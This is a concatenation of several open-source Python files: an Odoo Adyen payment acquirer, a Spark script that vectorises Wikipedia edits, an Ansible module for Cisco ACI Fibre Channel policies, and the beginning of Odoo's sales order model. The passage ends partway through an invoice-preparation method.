def setup_query(self, context, entity, path, loadopt, adapter, **kwargs):
pass
def create_row_processor(self, context, path, loadopt, mapper,
row, adapter):
"""Return row processing functions which fulfill the contract
specified by MapperProperty.create_row_processor.
StrategizedProperty delegates its create_row_processor method
directly to this method. """
return None, None, None
def __str__(self):
return str(self.parent_property)
|
luistorresm/odoo | refs/heads/8.0 | addons/payment_adyen/models/adyen.py | 165 | # -*- coding: utf-'8' "-*-"
import base64
try:
import simplejson as json
except ImportError:
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
_inherit = 'payment.acquirer'
def _get_adyen_urls(self, cr, uid, environment, context=None):
""" Adyen URLs
- yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
"""
return {
'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % ('live' if environment == 'prod' else environment),
}
def _get_providers(self, cr, uid, context=None):
providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
providers.append(['adyen', 'Adyen'])
return providers
_columns = {
'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
}
def _adyen_generate_merchant_sig(self, acquirer, inout, values):
""" Generate the shasign for incoming or outgoing communications.
:param browse acquirer: the payment.acquirer browse record. It should
have a shakey in shaky out
:param string inout: 'in' (openerp contacting ogone) or 'out' (adyen
contacting openerp). In this last case only some
fields should be contained (see e-Commerce basic)
:param dict values: transaction values
:return string: shasign
"""
assert inout in ('in', 'out')
assert acquirer.provider == 'adyen'
if inout == 'in':
keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
else:
keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()
def get_value(key):
if values.get(key):
return values[key]
return ''
sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
key = acquirer.adyen_skin_hmac_key.encode('ascii')
return base64.b64encode(hmac.new(key, sign, sha1).digest())
def adyen_form_generate_values(self, cr, uid, id, partner_values, tx_values, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
acquirer = self.browse(cr, uid, id, context=context)
# tmp
import datetime
from dateutil import relativedelta
tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
adyen_tx_values = dict(tx_values)
adyen_tx_values.update({
'merchantReference': tx_values['reference'],
'paymentAmount': '%d' % int(float_round(tx_values['amount'], 2) * 100),
'currencyCode': tx_values['currency'] and tx_values['currency'].name or '',
'shipBeforeDate': tmp_date,
'skinCode': acquirer.adyen_skin_code,
'merchantAccount': acquirer.adyen_merchant_account,
'shopperLocale': partner_values['lang'],
'sessionValidity': tmp_date,
'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
})
if adyen_tx_values.get('return_url'):
adyen_tx_values['merchantReturnData'] = json.dumps({'return_url': '%s' % adyen_tx_values.pop('return_url')})
adyen_tx_values['merchantSig'] = self._adyen_generate_merchant_sig(acquirer, 'in', adyen_tx_values)
return partner_values, adyen_tx_values
def adyen_get_form_action_url(self, cr, uid, id, context=None):
acquirer = self.browse(cr, uid, id, context=context)
return self._get_adyen_urls(cr, uid, acquirer.environment, context=context)['adyen_form_url']
class TxAdyen(osv.Model):
_inherit = 'payment.transaction'
_columns = {
'adyen_psp_reference': fields.char('Adyen PSP Reference'),
}
# --------------------------------------------------
# FORM RELATED METHODS
# --------------------------------------------------
def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
reference, pspReference = data.get('merchantReference'), data.get('pspReference')
if not reference or not pspReference:
error_msg = 'Adyen: received data with missing reference (%s) or missing pspReference (%s)' % (reference, pspReference)
_logger.error(error_msg)
raise ValidationError(error_msg)
# find tx -> @TDENOTE use pspReference ?
tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
if not tx_ids or len(tx_ids) > 1:
error_msg = 'Adyen: received data for reference %s' % (reference)
if not tx_ids:
error_msg += '; no order found'
else:
error_msg += '; multiple order found'
_logger.error(error_msg)
raise ValidationError(error_msg)
tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)
# verify shasign
shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
if shasign_check != data.get('merchantSig'):
error_msg = 'Adyen: invalid merchantSig, received %s, computed %s' % (data.get('merchantSig'), shasign_check)
_logger.warning(error_msg)
raise ValidationError(error_msg)
return tx
def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
invalid_parameters = []
# reference at acquirer: pspReference
if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
# seller
if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
# result
if not data.get('authResult'):
invalid_parameters.append(('authResult', data.get('authResult'), 'something'))
return invalid_parameters
def _adyen_form_validate(self, cr, uid, tx, data, context=None):
status = data.get('authResult', 'PENDING')
if status == 'AUTHORISED':
tx.write({
'state': 'done',
'adyen_psp_reference': data.get('pspReference'),
# 'date_validate': data.get('payment_date', fields.datetime.now()),
# 'paypal_txn_type': data.get('express_checkout')
})
return True
elif status == 'PENDING':
tx.write({
'state': 'pending',
'adyen_psp_reference': data.get('pspReference'),
})
return True
else:
error = 'Adyen: feedback error'
_logger.info(error)
tx.write({
'state': 'error',
'state_message': error
})
return False
|
tiffanyj41/hermes | refs/heads/master | src/data_prep/wiki_vectorize.py | 3 | from src.utils import article_to_category, glove, remove_templates, clean_categories, clean_links
import string
import numpy as np
class wiki_vectorize():
def __init__(self, user_interactions, content, user_vector_type, content_vector_type, sqlCtx, **support_files):
"""
Class initializer to load the required files.
The wikipedia data will be filtered to only the 2015 edits and content, as well as remove any articles without text,
edits without a user id (IP addresses) and article namespaces that are not 0 (articles).
Args:
user_interactions: The raw RDD of the user interactions. For Wikipedia, this it is the full edit history.
We have been reading it in as wiki_edits = sqlCtx.read.json(wiki_edit_json_data_path, schema=schema)
content: The raw RDD containing the item content. For Wikipedia, this is the latest edit which contains full article content
user_vector_type: The type of user vector desired. For Wikipedia you can choose between ['num_edits', 'any_interact', 'num_edits_ceil', 'none'].
num_edits_ceil will count the number of edits but set an upper limit of 5 edits
If 'none' is used then this means you will run your own custom mapping
content_vector_type: The type of content vector desired. For Wikipedia you can choose between ['glove', 'category_map', 'none'].
If none is chosen no content vector will be returned and None may be passed into the content argument.
You do not need a content vector to run pure CF only but some performance metrics will not be able to be ran
sqlCtx: The sequel content which is necessary for some of the queries
support_files: If they exist, the supporting files, dataFrames, and/or file links necessary to run the content vectors.
For example the category_map function at least needs the category_list from dbPedia
"""
self.user_vector_type = user_vector_type
self.content_vector_type = content_vector_type
self.sqlCtx = sqlCtx
#Filter out uninteresting articles and users if they still exist in the dataset
user_interactions.registerTempTable("ratings")
content.registerTempTable("content")
filtered = self.sqlCtx.sql("select * from ratings where redirect_target is null and article_namespace=0 and user_id is not null and timestamp like '2015%'")
filtered_content = self.sqlCtx.sql("select * from content where redirect_target is null and article_namespace=0 and full_text is not null and timestamp like '2015%'")
self.filtered = filtered
self.filtered.registerTempTable("wiki_ratings")
self.filtered_content = filtered_content
self.filtered_content.registerTempTable("wiki_content")
#if no support files were passed in, initialize an empty support file
if support_files:
self.support_files = support_files
else:
self.support_files = {}
def get_user_vector(self):
if self.user_vector_type=='num_edits':
user_info = self.sqlCtx.sql("select user_id as user, article_id as item, count(1) as rating from wiki_ratings \
group by user_id, article_id")
return user_info.rdd
elif self.user_vector_type=='any_interact':
user_info = self.sqlCtx.sql("select user_id as user, article_id as item, 1 as rating from wiki_ratings \
group by user_id, article_id")
return user_info.rdd
elif self.user_vector_type=='num_edits_ceil':
user_info = self.sqlCtx.sql("select user_id as user, article_id as item, count(1) as rating from wiki_ratings \
group by user_id, article_id")\
.map(lambda (user, article, rating): (user, article, min(rating, 5)))
return user_info
elif self.user_vector_type=='none':
return None
else:
print "Please choose a user_vector_type between num_edits, any_interact, num_edits_ceil or none"
return None
def get_content_vector(self):
if self.content_vector_type=='glove':
if "glove_model" in self.support_files:
glove_model = self.support_files["glove_model"]
article_mapping = self.filtered_content\
.map(lambda row: (row.article_id, remove_templates.remove_templates(row.full_text)))\
.map(lambda tup: (tup[0],clean_categories.clean_categories(tup[1])))\
.map(lambda tup: (tup[0],clean_links.clean_links(tup[1])))\
.map(
lambda tup:
(tup[0], tup[1]\
.replace('\n', ' ')\
.replace("<ref>", '')\
.replace("</ref>", '')\
)
)\
.map(lambda tup: (tup[0], remove_punctuation(tup[1])))\
.map(lambda tup: (tup[0], remove_urls(tup[1])))\
.map(lambda tup: (tup[0], article_to_glove(tup[1], glove_model)))
return article_mapping
else:
print "Please pass in a glove_model. Like: support_files['glove_model']=Glove('glove.6B.50d.txt')"
elif self.content_vector_type=='category_map':
if set(["high_level_categories", "category_index_graph_link", "category_idx"]).issubset(self.support_files):
#The category map supporting dataFrames and objects are as followed:
#high_level_idx: An array of the high level categories to map to e.g. ['Concepts', 'Life', 'Physical_universe', 'Society']
#category_index_graph_link: Path to the csv of the category links as created from wiki_categories.create_linked_list()
#category_idx: Dictionary of the categories to an index as created from wiki_categories.create_category_idx_dicts()
high_level_categories = self.support_files['high_level_categories']
category_index_graph_link = self.support_files['category_index_graph_link']
category_idx = self.support_files['category_idx']
ac = article_to_category.article_to_category(high_level_categories, category_index_graph_link, category_idx)
article_mapping = ac.run_mapping(self.filtered_content)
return article_mapping
else:
#print "To run category map you must at least have the category_list from dbPedia"
##TODO work on the article_to_category function so that it can just pull in the category list from dpPedia
print "Please pass in the following files:"
print "high_level_idx: An array of the high level categories to map to e.g. ['Concepts', 'Life', 'Physical_universe', 'Society']"
print 'category_index_graph_link: Path to the csv of the category links as created from wiki_categories.create_linked_list()'
print 'category_idx: Dictionary of the categories to an index as created from wiki_categories.create_category_idx_dicts()'
print 'support_files = {"high_level_categories" : high_level_categories, \
"category_index_graph_link" : category_index_graph_link, \
"category_idx" : category_idx}'
return None
elif self.content_vector_type=='none':
return None
else:
print "Please choose between glove, category_map or none"
return None
def remove_punctuation(text):
for char in string.punctuation:
text = text.replace(char, '')
return text
def article_to_glove(text, model):
vec = np.zeros(model.vector_size)
for word in text.split():
vec += model[word.lower()]
return vec
def remove_urls(text):
stext = text.split()
next_text = []
for word in stext:
if word.startswith('http'):
continue
else:
next_text.append(word)
return ' '.join(next_text) |
tima/ansible | refs/heads/devel | lib/ansible/modules/network/aci/aci_intf_policy_fc.py | 2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: aci_intf_policy_fc
short_description: Manage Fibre Channel interface policies on Cisco ACI fabrics (fc:IfPol)
description:
- Manage ACI Fiber Channel interface policies on Cisco ACI fabrics.
- More information from the internal APIC class I(fc:IfPol) at
U(https://developer.cisco.com/docs/apic-mim-ref/).
author:
- Dag Wieers (@dagwieers)
version_added: '2.4'
options:
fc_policy:
description:
- The name of the Fiber Channel interface policy.
required: yes
aliases: [ name ]
description:
description:
- The description of the Fiber Channel interface policy.
aliases: [ descr ]
port_mode:
description:
- Port Mode
choices: [ f, np ]
default: f
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- aci_intf_policy_fc:
hostname: '{{ hostname }}'
username: '{{ username }}'
password: '{{ password }}'
fc_policy: '{{ fc_policy }}'
port_mode: '{{ port_mode }}'
description: '{{ description }}'
state: present
'''
RETURN = r'''
#
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
fc_policy=dict(type='str', required=False, aliases=['name']), # Not required for querying all objects
description=dict(type='str', aliases=['descr']),
port_mode=dict(type='str', choices=['f', 'np']), # No default provided on purpose
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
method=dict(type='str', choices=['delete', 'get', 'post'], aliases=['action'], removed_in_version='2.6'), # Deprecated starting from v2.6
protocol=dict(type='str', removed_in_version='2.6'), # Deprecated in v2.6
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['fc_policy']],
['state', 'present', ['fc_policy']],
],
)
fc_policy = module.params['fc_policy']
port_mode = module.params['port_mode']
description = module.params['description']
state = module.params['state']
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fcIfPol',
aci_rn='infra/fcIfPol-{0}'.format(fc_policy),
filter_target='eq(fcIfPol.name, "{0}")'.format(fc_policy),
module_object=fc_policy,
),
)
aci.get_existing()
if state == 'present':
# Filter out module parameters with null values
aci.payload(
aci_class='fcIfPol',
class_config=dict(
name=fc_policy,
descr=description,
portMode=port_mode,
),
)
# Generate config diff which will be used as POST request body
aci.get_diff(aci_class='fcIfPol')
# Submit changes if module not in check_mode and the proposed is different than existing
aci.post_config()
elif state == 'absent':
aci.delete_config()
module.exit_json(**aci.result)
if __name__ == "__main__":
main()
|
OpusVL/odoo | refs/heads/master | addons/sale/sale.py | 1 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
import time
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
import openerp.addons.decimal_precision as dp
from openerp import workflow
class res_company(osv.Model):
_inherit = "res.company"
_columns = {
'sale_note': fields.text('Default Terms and Conditions', translate=True, help="Default terms and conditions for quotations."),
}
class sale_order(osv.osv):
_name = "sale.order"
_inherit = ['mail.thread', 'ir.needaction_mixin']
_description = "Sales Order"
_track = {
'state': {
'sale.mt_order_confirmed': lambda self, cr, uid, obj, ctx=None: obj.state in ['manual'],
'sale.mt_order_sent': lambda self, cr, uid, obj, ctx=None: obj.state in ['sent']
},
}
def _amount_line_tax(self, cr, uid, line, context=None):
val = 0.0
for c in self.pool.get('account.tax').compute_all(cr, uid, line.tax_id, line.price_unit * (1-(line.discount or 0.0)/100.0), line.product_uom_qty, line.product_id, line.order_id.partner_id)['taxes']:
val += c.get('amount', 0.0)
return val
def _amount_all_wrapper(self, cr, uid, ids, field_name, arg, context=None):
""" Wrapper because of direct method passing as parameter for function fields """
return self._amount_all(cr, uid, ids, field_name, arg, context=context)
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
cur_obj = self.pool.get('res.currency')
res = {}
for order in self.browse(cr, uid, ids, context=context):
res[order.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
}
val = val1 = 0.0
cur = order.pricelist_id.currency_id
for line in order.order_line:
val1 += line.price_subtotal
val += self._amount_line_tax(cr, uid, line, context=context)
res[order.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[order.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, val1)
res[order.id]['amount_total'] = res[order.id]['amount_untaxed'] + res[order.id]['amount_tax']
return res
def _invoiced_rate(self, cursor, user, ids, name, arg, context=None):
res = {}
for sale in self.browse(cursor, user, ids, context=context):
if sale.invoiced:
res[sale.id] = 100.0
continue
tot = 0.0
for invoice in sale.invoice_ids:
if invoice.state not in ('draft', 'cancel'):
tot += invoice.amount_untaxed
if tot:
res[sale.id] = min(100.0, tot * 100.0 / (sale.amount_untaxed or 1.00))
else:
res[sale.id] = 0.0
return res
def _invoice_exists(self, cursor, user, ids, name, arg, context=None):
res = {}
for sale in self.browse(cursor, user, ids, context=context):
res[sale.id] = False
if sale.invoice_ids:
res[sale.id] = True
return res
def _invoiced(self, cursor, user, ids, name, arg, context=None):
res = {}
for sale in self.browse(cursor, user, ids, context=context):
res[sale.id] = True
invoice_existence = False
for invoice in sale.invoice_ids:
if invoice.state!='cancel':
invoice_existence = True
if invoice.state != 'paid':
res[sale.id] = False
break
if not invoice_existence or sale.state == 'manual':
res[sale.id] = False
return res
def _invoiced_search(self, cursor, user, obj, name, args, context=None):
if not len(args):
return []
clause = ''
sale_clause = ''
no_invoiced = False
for arg in args:
if (arg[1] == '=' and arg[2]) or (arg[1] == '!=' and not arg[2]):
clause += 'AND inv.state = \'paid\''
else:
clause += 'AND inv.state != \'cancel\' AND sale.state != \'cancel\' AND inv.state <> \'paid\' AND rel.order_id = sale.id '
sale_clause = ', sale_order AS sale '
no_invoiced = True
cursor.execute('SELECT rel.order_id ' \
'FROM sale_order_invoice_rel AS rel, account_invoice AS inv '+ sale_clause + \
'WHERE rel.invoice_id = inv.id ' + clause)
res = cursor.fetchall()
if no_invoiced:
cursor.execute('SELECT sale.id ' \
'FROM sale_order AS sale ' \
'WHERE sale.id NOT IN ' \
'(SELECT rel.order_id ' \
'FROM sale_order_invoice_rel AS rel) and sale.state != \'cancel\'')
res.extend(cursor.fetchall())
if not res:
return [('id', '=', 0)]
return [('id', 'in', [x[0] for x in res])]
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
def _get_default_company(self, cr, uid, context=None):
company_id = self.pool.get('res.users')._get_company(cr, uid, context=context)
if not company_id:
raise osv.except_osv(_('Error!'), _('There is no default company for the current user!'))
return company_id
def _get_default_team_id(self, cr, uid, context=None):
""" Gives default team by checking if present in the context """
team_id = self._resolve_team_id_from_context(cr, uid, context=context) or False
return team_id
def _resolve_team_id_from_context(self, cr, uid, context=None):
""" Returns ID of team based on the value of 'team_id'
context key, or None if it cannot be resolved to a single
Sales Team.
"""
if context is None:
context = {}
if type(context.get('default_team_id')) in (int, long):
return context.get('default_team_id')
if isinstance(context.get('default_team_id'), basestring):
team_ids = self.pool.get('crm.team').name_search(cr, uid, name=context['default_team_id'], context=context)
if len(team_ids) == 1:
return int(team_ids[0][0])
return None
_columns = {
'name': fields.char('Order Reference', required=True, copy=False,
readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True),
'origin': fields.char('Source Document', help="Reference of the document that generated this sales order request."),
'client_order_ref': fields.char('Customer Reference', copy=False),
'state': fields.selection([
('draft', 'Draft Quotation'),
('sent', 'Quotation Sent'),
('cancel', 'Cancelled'),
('waiting_date', 'Waiting Schedule'),
('progress', 'Sales Order'),
('manual', 'Sale to Invoice'),
('shipping_except', 'Shipping Exception'),
('invoice_except', 'Invoice Exception'),
('done', 'Done'),
], 'Status', readonly=True, copy=False, help="Gives the status of the quotation or sales order.\
\nThe exception status is automatically set when a cancel operation occurs \
in the invoice validation (Invoice Exception) or in the picking list process (Shipping Exception).\nThe 'Waiting Schedule' status is set when the invoice is confirmed\
but waiting for the scheduler to run on the order date.", select=True),
'date_order': fields.datetime('Date', required=True, readonly=True, select=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, copy=False),
'validity_date': fields.date('Expiration Date', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}),
'create_date': fields.datetime('Creation Date', readonly=True, select=True, help="Date on which sales order is created."),
'date_confirm': fields.date('Confirmation Date', readonly=True, select=True, help="Date on which sales order is confirmed.", copy=False),
'user_id': fields.many2one('res.users', 'Salesperson', states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True, track_visibility='onchange'),
'partner_id': fields.many2one('res.partner', 'Customer', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, required=True, change_default=True, select=True, track_visibility='always'),
'partner_invoice_id': fields.many2one('res.partner', 'Invoice Address', readonly=True, required=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Invoice address for current sales order."),
'partner_shipping_id': fields.many2one('res.partner', 'Delivery Address', readonly=True, required=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Delivery address for current sales order."),
'order_policy': fields.selection([
('manual', 'On Demand'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""This field controls how invoice and delivery operations are synchronized."""),
'pricelist_id': fields.many2one('product.pricelist', 'Pricelist', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Pricelist for current sales order."),
'currency_id': fields.related('pricelist_id', 'currency_id', type="many2one", relation="res.currency", string="Currency", readonly=True, required=True),
'project_id': fields.many2one('account.analytic.account', 'Contract / Analytic', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="The analytic account related to a sales order."),
'order_line': fields.one2many('sale.order.line', 'order_id', 'Order Lines', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, copy=True),
'invoice_ids': fields.many2many('account.invoice', 'sale_order_invoice_rel', 'order_id', 'invoice_id', 'Invoices', readonly=True, copy=False, help="This is the list of invoices that have been generated for this sales order. The same sales order may have been invoiced in several times (by line for example)."),
'invoiced_rate': fields.function(_invoiced_rate, string='Invoiced Ratio', type='float'),
'invoiced': fields.function(_invoiced, string='Paid',
fnct_search=_invoiced_search, type='boolean', help="It indicates that an invoice has been paid."),
'invoice_exists': fields.function(_invoice_exists, string='Invoiced',
fnct_search=_invoiced_search, type='boolean', help="It indicates that sales order has at least one invoice."),
'note': fields.text('Terms and conditions'),
'amount_untaxed': fields.function(_amount_all_wrapper, digits_compute=dp.get_precision('Account'), string='Untaxed Amount',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty'], 10),
},
multi='sums', help="The amount without tax.", track_visibility='always'),
'amount_tax': fields.function(_amount_all_wrapper, digits_compute=dp.get_precision('Account'), string='Taxes',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty'], 10),
},
multi='sums', help="The tax amount."),
'amount_total': fields.function(_amount_all_wrapper, digits_compute=dp.get_precision('Account'), string='Total',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty'], 10),
},
multi='sums', help="The total amount."),
'payment_term': fields.many2one('account.payment.term', 'Payment Term'),
'fiscal_position': fields.many2one('account.fiscal.position', 'Fiscal Position'),
'company_id': fields.many2one('res.company', 'Company'),
'team_id': fields.many2one('crm.team', 'Sales Team', oldname='section_id', change_default=True),
'procurement_group_id': fields.many2one('procurement.group', 'Procurement group', copy=False),
'product_id': fields.related('order_line', 'product_id', type='many2one', relation='product.product', string='Product'),
}
_defaults = {
'date_order': fields.datetime.now,
'order_policy': 'manual',
'company_id': _get_default_company,
'state': 'draft',
'user_id': lambda obj, cr, uid, context: uid,
'name': lambda obj, cr, uid, context: '/',
'partner_invoice_id': lambda self, cr, uid, context: context.get('partner_id', False) and self.pool.get('res.partner').address_get(cr, uid, [context['partner_id']], ['invoice'])['invoice'],
'partner_shipping_id': lambda self, cr, uid, context: context.get('partner_id', False) and self.pool.get('res.partner').address_get(cr, uid, [context['partner_id']], ['delivery'])['delivery'],
'note': lambda self, cr, uid, context: self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.sale_note,
'team_id': lambda s, cr, uid, c: s._get_default_team_id(cr, uid, c),
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Order Reference must be unique per Company!'),
]
_order = 'date_order desc, id desc'
# Form filling
def unlink(self, cr, uid, ids, context=None):
sale_orders = self.read(cr, uid, ids, ['state'], context=context)
unlink_ids = []
for s in sale_orders:
if s['state'] in ['draft', 'cancel']:
unlink_ids.append(s['id'])
else:
raise osv.except_osv(_('Invalid Action!'), _('In order to delete a confirmed sales order, you must cancel it before!'))
return osv.osv.unlink(self, cr, uid, unlink_ids, context=context)
def copy_quotation(self, cr, uid, ids, context=None):
id = self.copy(cr, uid, ids[0], context=context)
view_ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')
view_id = view_ref and view_ref[1] or False,
return {
'type': 'ir.actions.act_window',
'name': _('Sales Order'),
'res_model': 'sale.order',
'res_id': id,
'view_type': 'form',
'view_mode': 'form',
'view_id': view_id,
'target': 'current',
'nodestroy': True,
}
def onchange_pricelist_id(self, cr, uid, ids, pricelist_id, order_lines, context=None):
context = context or {}
if not pricelist_id:
return {}
value = {
'currency_id': self.pool.get('product.pricelist').browse(cr, uid, pricelist_id, context=context).currency_id.id
}
if not order_lines or order_lines == [(6, 0, [])]:
return {'value': value}
warning = {
'title': _('Pricelist Warning!'),
'message' : _('If you change the pricelist of this order (and eventually the currency), prices of existing order lines will not be updated.')
}
return {'warning': warning, 'value': value}
def get_salenote(self, cr, uid, ids, partner_id, context=None):
context_lang = context.copy()
if partner_id:
partner_lang = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context).lang
context_lang.update({'lang': partner_lang})
return self.pool.get('res.users').browse(cr, uid, uid, context=context_lang).company_id.sale_note
def onchange_delivery_id(self, cr, uid, ids, company_id, partner_id, delivery_id, fiscal_position, context=None):
r = {'value': {}}
if not fiscal_position:
if not company_id:
company_id = self._get_default_company(cr, uid, context=context)
fiscal_position = self.pool['account.fiscal.position'].get_fiscal_position(cr, uid, company_id, partner_id, delivery_id, context=context)
if fiscal_position:
r['value']['fiscal_position'] = fiscal_position
return r
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value': {'partner_invoice_id': False, 'partner_shipping_id': False, 'payment_term': False, 'fiscal_position': False}}
part = self.pool.get('res.partner').browse(cr, uid, part, context=context)
addr = self.pool.get('res.partner').address_get(cr, uid, [part.id], ['delivery', 'invoice', 'contact'])
pricelist = part.property_product_pricelist and part.property_product_pricelist.id or False
payment_term = part.property_payment_term and part.property_payment_term.id or False
dedicated_salesman = part.user_id and part.user_id.id or uid
val = {
'partner_invoice_id': addr['invoice'],
'partner_shipping_id': addr['delivery'],
'payment_term': payment_term,
'user_id': dedicated_salesman,
}
delivery_onchange = self.onchange_delivery_id(cr, uid, ids, False, part.id, addr['delivery'], False, context=context)
val.update(delivery_onchange['value'])
if pricelist:
val['pricelist_id'] = pricelist
sale_note = self.get_salenote(cr, uid, ids, part.id, context=context)
if sale_note: val.update({'note': sale_note})
return {'value': val}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
if vals.get('name', '/') == '/':
vals['name'] = self.pool.get('ir.sequence').next_by_code(cr, uid, 'sale.order') or '/'
if vals.get('partner_id') and any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id', 'fiscal_position']):
defaults = self.onchange_partner_id(cr, uid, [], vals['partner_id'], context=context)['value']
if not vals.get('fiscal_position') and vals.get('partner_shipping_id'):
delivery_onchange = self.onchange_delivery_id(cr, uid, [], vals.get('company_id'), None, vals['partner_id'], vals.get('partner_shipping_id'), context=context)
defaults.update(delivery_onchange['value'])
vals = dict(defaults, **vals)
ctx = dict(context or {}, mail_create_nolog=True)
new_id = super(sale_order, self).create(cr, uid, vals, context=ctx)
self.message_post(cr, uid, [new_id], body=_("Quotation created"), context=ctx)
return new_id
def button_dummy(self, cr, uid, ids, context=None):
return True
# FIXME: deprecated method, overriders should be using _prepare_invoice() instead.
# can be removed after 6.1.
def _inv_get(self, cr, uid, order, context=None):
return {}
def _prepare_invoice(self, cr, uid, order, lines, context=None):
"""Prepare the dict of values to create the new invoice for a
sales order. This method may be overridden to implement custom
invoice generation (making sure to call super() to establish
a clean extension chain).
:param browse_record order: sale.order record to invoice
:param list(int) line: list of invoice line IDs that must be
attached to the invoice
:return: dict of value to create() the invoice
"""
if context is None:
context = {}
journal_ids = self.pool.get('account.journal').search(cr, uid,
[('type', '=', 'sale'), ('company_id', '=', order.company_id.id)],
limit=1)
if not journal_ids:
raise osv.except_osv(_('Error!'),
_('Please define sales journal for this company: "%s" (id:%d).') % (order.company_id.name, order.company_id.id))
invoice_vals = {
'name': order.client_order_ref or '',
'origin': order.name,
'type': 'out_invoice',
'reference': order.client_order_ref or order.name,
'account_id': order.partner_id.property_account_receivable.id,
'partner_id': order.partner_invoice_id.id,
'journal_id': journal_ids[0],
'invoice_line': [(6, 0, lines)],
'currency_id': order.pricelist_id.currency_id.id,
'comment': order.note,
'payment_term': order.payment_term and order.payment_term.id or False,
'fiscal_position': order.fiscal_position.id or order.partner_id.property_account_position.id,
'date_invoice': context.get('date_invoice', False),
'company_id': order.company_id.id,
'user_id': order.user_id and order.user_id.id or False,
